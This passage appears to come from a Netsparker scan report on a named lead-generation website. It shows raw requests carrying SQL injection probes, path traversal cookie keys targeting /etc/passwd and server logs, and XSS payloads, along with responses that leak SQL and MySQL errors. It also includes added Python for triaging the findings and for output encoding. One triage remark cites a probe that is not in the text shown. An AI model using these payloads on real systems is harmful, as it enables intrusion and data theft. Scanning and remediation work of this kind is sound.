OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:32:29 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=kamplcfjfl53r422q4kc5hb4k0; path=/
Content-Length: 4013
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select 
chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'numeric)||'' OR 
prj.project_page_url = 'leadflow/fist00/project.php?catId=10003&' at line 5
- /ppc/leadflow/weho00/project.php

/ppc/leadflow/weho00/project.php

http://www.insideup.com/ppc/leadflow/weho00/project.php?catId=20003&iusrc='%7C%7Ccast((select%20chr(..

Parameters

Parameter Type Value
catId GET 20003
iusrc GET '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'

Request

GET /ppc/leadflow/weho00/project.php?catId=20003&iusrc='%7C%7Ccast((select%20chr(95)%7C%7Cchr(33)%7C%7Cchr(64)%7C%7Cchr(53)%7C%7Cchr(100)%7C%7Cchr(105)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(109)%7C%7Cchr(109)%7C%7Cchr(97))%20as%20numeric)%7C%7C' HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:33:44 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=skd6av0kd4gohuimjahqaje553; path=/
Content-Length: 4013
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select 
chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'' OR prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc='||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'numeric)||'' OR 
prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&' at line 5
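Triage note on the two project.php findings above, as an added example rather than anything from the report or the scanned site: the value sent in iusrc is a PostgreSQL-style probe (chr() calls joined with ||, then cast to numeric), and the response that opens this part of the report carries the MSSQL-style equivalent (CHAR() calls joined with +, then convert(int, ...)). Both spell out a marker string ("_!@5dilemma" and "_!@2dilemma") that a PostgreSQL or SQL Server error would echo back; the backend here is MySQL, which rejects the syntax outright but still confirms the injection, because the error page prints the whole statement with the parameter concatenated into it unescaped. The Python below (names and the small signature table are mine; the sample response is an abbreviated copy of the weho00 body shown above) decodes the marker from either probe form, identifies the DBMS from the error text, and checks whether the raw payload appears inside the leaked statement. Real responses may HTML-encode the echoed SQL, in which case the body should be unescaped before this check.

```python
import re
from urllib.parse import unquote

# Probe values copied from the report: the PostgreSQL-style one sent in "iusrc"
# to the two project.php pages above, and the MSSQL-style convert(int, CHAR()+...)
# form visible in the response that opens this part of the report.
PG_STYLE_PAYLOAD = (
    "'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)"
    "||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'"
)
MSSQL_STYLE_PAYLOAD = (
    "'+ convert(int,(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)"
    "+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))) +'"
)

# Abbreviated copy of the weho00 response body shown in the report (the real body
# repeats the same statement for five UNIONed tables before the MySQL error).
SAMPLE_RESPONSE = (
    "select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url "
    "from lead_flow_one_pages_details prj where prj.project_page_url = "
    f"'leadflow/weho00/project.php?catId=20003&iusrc={PG_STYLE_PAYLOAD}' OR "
    f"prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&iusrc={PG_STYLE_PAYLOAD}/'"
    "You have an error in your SQL syntax; check the manual that corresponds to your "
    "MySQL server version for the right syntax to use near 'numeric)||'' OR "
    "prj.project_page_url = 'leadflow/weho00/project.php?catId=20003&' at line 5"
)

# Matches both chr(95) (PostgreSQL) and CHAR(95) (SQL Server) call forms.
CHR_CALL = re.compile(r"\b(?:chr|char)\((\d+)\)", re.IGNORECASE)

# Minimal error-signature table for this example; a scanner carries far more.
DBMS_ERROR_SIGNATURES = {
    "MySQL": re.compile(r"You have an error in your SQL syntax|MySQL server version"),
    "PostgreSQL": re.compile(r"invalid input syntax for (?:type )?(?:integer|numeric)"),
    "MSSQL": re.compile(r"Conversion failed when converting|Unclosed quotation mark"),
    "Oracle": re.compile(r"\bORA-\d{5}\b"),
}


def decode_canary(payload: str) -> str:
    """Rebuild the marker string a probe spells out as chr()/CHAR() calls."""
    return "".join(chr(int(code)) for code in CHR_CALL.findall(payload))


def identify_dbms(body: str):
    """Name of the first DBMS whose error signature appears in the body, else None."""
    for name, signature in DBMS_ERROR_SIGNATURES.items():
        if signature.search(body):
            return name
    return None


def leaked_statement(body: str) -> str:
    """SQL text echoed ahead of a MySQL error message, or '' if there is none."""
    m = re.search(r"^\s*(select\b.*?)You have an error in your SQL syntax", body, re.S | re.I)
    return m.group(1).strip() if m else ""


def classify_response(body: str, payload: str) -> dict:
    """Decide what a probe response proves, in decreasing order of certainty."""
    payload = unquote(payload)          # accept the URL-encoded form from the request line
    canary = decode_canary(payload)
    dbms = identify_dbms(body)
    statement = leaked_statement(body)
    payload_in_sql = payload in statement
    if canary in body:
        verdict = "confirmed: canary was evaluated by the database and returned"
    elif dbms and payload_in_sql:
        verdict = "confirmed: parameter is concatenated unescaped into the SQL statement"
    elif dbms:
        verdict = "probable: database error, payload not echoed; retry with a DBMS-specific probe"
    else:
        verdict = "not confirmed"
    return {"canary": canary, "dbms": dbms, "payload_in_sql": payload_in_sql, "verdict": verdict}


if __name__ == "__main__":
    for key, value in classify_response(SAMPLE_RESPONSE, PG_STYLE_PAYLOAD).items():
        print(f"{key:>14}: {value}")
```

For the weho00 body the result is dbms "MySQL", payload_in_sql True and the second "confirmed" verdict; the same helper run against a PostgreSQL "invalid input syntax for type numeric" page would report the canary verdict instead, which is the outcome the probe was built for.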
Cross-site Scripting

Cross-site Scripting

150 TOTAL
IMPORTANT
CONFIRMED
150
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. It occurs because input supplied by a user is written back into a page and interpreted by the browser as HTML, JavaScript or VBScript rather than as plain data. The most common consequences are hijacking the current user's session and altering the page's HTML on the fly, for example to present a fake login form that steals the user's credentials.

XSS targets the users of the application rather than the server. Although that limits its direct impact, it lets an attacker hijack other users' sessions, and an attacker who targets an administrator can gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hijacking users' active sessions
  • Changing the look of the page within the victim's browser
  • Mounting a successful phishing attack
  • Intercepting data and performing man-in-the-middle attacks

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, validate all input to the application and encode all output. Output must be encoded for the format and location in which it is written: a value placed in an HTML element body, in an attribute value and in a JavaScript string literal each needs a different encoding, and a single generic filter will miss at least one of them. Typically the output location is HTML; where it is, ensure that all active content is removed or encoded before the page is sent to the user's browser.

Before sanitizing user input, define a white-list of the characters that are expected and acceptable for each field. This list needs to be defined only once and should then be used to validate all subsequent input. Input validation is a defence-in-depth measure and does not replace output encoding: legitimate input, such as a company name containing an apostrophe or an ampersand, must still be rendered safely.

A number of well-structured white-list and encoding libraries are available for many environments; OWASP Reform and the Microsoft Anti-Cross Site Scripting Library are good examples.
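The contextual-encoding remedy, shown as an added example in Python that is not code from the report or from the scanned site. It takes the exact payload the report submitted in the company field of /whitePapaper.html and contrasts the reflection pattern the finding describes (values copied straight into the page) with a hardened rendering in which each value is encoded for the context it lands in: element body, attribute value and JavaScript string. The name allow-list, the render functions and the page fragment are hypothetical, chosen for this illustration; the script-element count is a rough proxy for what a browser would parse, good enough to show the difference.

```python
import html
import json
import re

# Payload the report sent in the "company" field of /whitePapaper.html.
REPORT_PAYLOAD = "'\"--></style></script><script>netsparker(0x000367)</script>"

# Allow-list for a person-name field (hypothetical policy for this example):
# a leading letter, then letters, spaces, apostrophes, hyphens and dots, 64 chars max.
NAME_ALLOWED = re.compile(r"^[A-Za-z][A-Za-z .'\-]{0,63}$")


def validate_name(value: str) -> bool:
    """Input validation: accept only characters a name field is expected to carry."""
    return NAME_ALLOWED.fullmatch(value) is not None


def encode_html_body(value: str) -> str:
    """Encode for an HTML element body: & < > " ' become character references."""
    return html.escape(value, quote=True)


def encode_html_attr(value: str) -> str:
    """Encode for a double-quoted HTML attribute value; the caller supplies the quotes."""
    return html.escape(value, quote=True)


def encode_js_string(value: str) -> str:
    """Encode for a JavaScript string literal inside a <script> block.

    json.dumps yields a quoted literal with " and \\ escaped and non-ASCII
    characters (including U+2028/2029) as \\uXXXX; <, > and & are escaped too,
    so '</script>' or an HTML comment can never terminate the script element."""
    literal = json.dumps(value)
    return literal.replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026")


def render_unsafe(fields: dict) -> str:
    """The pattern the finding describes: submitted values copied straight into the page."""
    return (
        f"<p>Thank you, {fields['firstName']}.</p>\n"
        f"<input type=\"hidden\" name=\"company\" value=\"{fields['company']}\">\n"
        f"<script>var company = '{fields['company']}';</script>"
    )


def render_safe(fields: dict) -> str:
    """Hardened form: every value encoded for the exact context it is written into."""
    return (
        f"<p>Thank you, {encode_html_body(fields['firstName'])}.</p>\n"
        f"<input type=\"hidden\" name=\"company\" value=\"{encode_html_attr(fields['company'])}\">\n"
        f"<script>var company = {encode_js_string(fields['company'])};</script>"
    )


SCRIPT_OPEN = re.compile(r"<script\b", re.IGNORECASE)


def script_element_count(fragment: str) -> int:
    """Number of <script> start tags a browser would parse in the fragment."""
    return len(SCRIPT_OPEN.findall(fragment))


if __name__ == "__main__":
    submitted = {"firstName": "Smith", "company": REPORT_PAYLOAD}
    print("firstName passes allow-list:", validate_name(submitted["firstName"]))
    print("company passes allow-list:  ", validate_name(submitted["company"]))
    print("unsafe render, <script> tags:", script_element_count(render_unsafe(submitted)))
    print("safe render,   <script> tags:", script_element_count(render_safe(submitted)))
```

With the report's payload the unsafe fragment parses three script start tags (one injected through the attribute, one through the JavaScript string, plus the page's own), while the hardened fragment parses only the page's own, yet still carries the submitted text intact as inert data.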

Remedy References

External References

- /whitePapaper.html

/whitePapaper.html CONFIRMED

http://www.insideup.com/whitePapaper.html

Parameters

Parameter Type Value
company POST '"--></style></script><script>alert(0x000367)</script>
companyServices POST 3
email POST netsparker@example.com
firstName POST Smith
iusrc POST 3
lastName POST Smith
parentPage POST 3
phone POST 3
src POST aboutUs
Submit POST 3
url POST 3

Request

POST /whitePapaper.html HTTP/1.1
Referer: http://www.insideup.com/aboutUs.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
